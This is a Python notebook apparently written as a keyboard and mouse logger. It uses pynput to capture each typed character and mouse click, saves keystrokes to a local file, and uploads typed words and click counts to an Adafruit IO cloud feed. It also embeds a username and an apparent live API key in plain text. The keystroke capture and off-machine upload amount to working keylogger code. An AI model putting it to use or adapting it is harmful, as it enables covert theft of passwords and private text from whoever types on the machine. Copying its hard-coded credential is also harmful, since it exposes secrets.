In [ ]:
from pynput import keyboard
from pynput import mouse
import datetime
from Adafruit_IO import Client
from threading import Thread
from time import time, sleep

## Save data functions

In [ ]:
def saveLogs(event, value):
    timestamp = get_current_time()
    f = open('logger.txt', 'a')
    f.write(timestamp + '|' + event + '|' + value + '\n')
    f.close()

def get_current_time():
    now = datetime.datetime.now()
    return now.strftime("%Y-%m-%d %H:%M:%S")

In [ ]:
def uploadKeys(cache):
    print('Uploading data...')
    for key in cache:
        aio.send(feedName, key)
    cache = ''
    print('Uploading sucessfull!')
    return cache

def uploadWord(word):
    print('Word: ' + word)
    print('Uploading word...')
    aio.send(feedName, word)
    word = ''
    print('Uploading sucessfull!')
    return word

## Keyboard functions

In [ ]:
# Global variables
wordKey = True
keycache = ''

#detect key press
def on_press(key):
    try:
        global keycache
        if wordKey: # Upload by word
            keycache = keycache + key.char
            if len(keycache) > 20:
                keycache = uploadWord(keycache)
        else: # Upload by key
            keycache = keycache + key.char
            if len(keycache) > 10:
                keycache = uploadKeys(keycache)
                
        saveLogs('KeyPressed', key.char)
    except AttributeError:
        if key == keyboard.Key.space:
            keycache = uploadWord(keycache)
        

#detect key releases
def on_release(key):
    global keycache
    if key == keyboard.Key.esc:
        if wordKey: # Upload by word
            if len(keycache) > 0:
                keycache = uploadWord(keycache)
        else: # Upload by key
            if len(keycache) <= 10 and keycache != '':
                keycache = uploadKeys(keycache)

        #stop listener
        print('Gracefully Stopping!')
        return False


## Mouse functions

In [ ]:
# Global variables
rightClickCounter = 0
leftClickCounter = 0

#detect mouse movement
def on_move(x, y):
    #print('Pointer moved to {0}'.format((x, y)))
    pass
#detect mouse scroll
def on_scroll(x, y, dx, dy):
    #print('Mouse scrolled at ({0}, {1})({2}, {3})'.format(x, y, dx, dy))
    pass

#detect mouse click
def on_click(x, y, button, pressed):
    global leftClickCounter
    global rightClickCounter
    if button == mouse.Button.left:
        leftClickCounter += 1
    elif button == mouse.Button.right:
        rightClickCounter += 1
    if button == mouse.Button.middle:
        #stop listener
        print('Gracefully Stopping!')
        return False

def threaded_function(): # Calcular numero de cliques num intervalo de tempo
    global leftClickCounter
    global rightClickCounter
    print('Aqui')
    while(running):
        sleep(30)
        print('Uploading...')
        aio.send('kmdata.leftmouse', leftClickCounter)
        aio.send('kmdata.rightmouse', rightClickCounter)
        print('Uploading sucessfull!')
        rightClickCounter = 0
        leftClickCounter = 0
        
        


# Main

In [ ]:
username = 'carolinaSantejo'
key = 'aio_DqXa30o4P1DSuPmL9o78J9pUBSl9'
feedName = 'kmdata.keyboarddata'

aio = Client(username, key)
keybMouse = False

running = True

if keybMouse:
    #collect keyboard events
    with keyboard.Listener(on_press=on_press, on_release=on_release) as klistener:
        klistener.join()
else:
    #collect mouse events
    thread = Thread(target = threaded_function)
    thread.start()
    with mouse.Listener(on_move=on_move, on_click=on_click, on_scroll=on_scroll) as mlistener:
        mlistener.join()
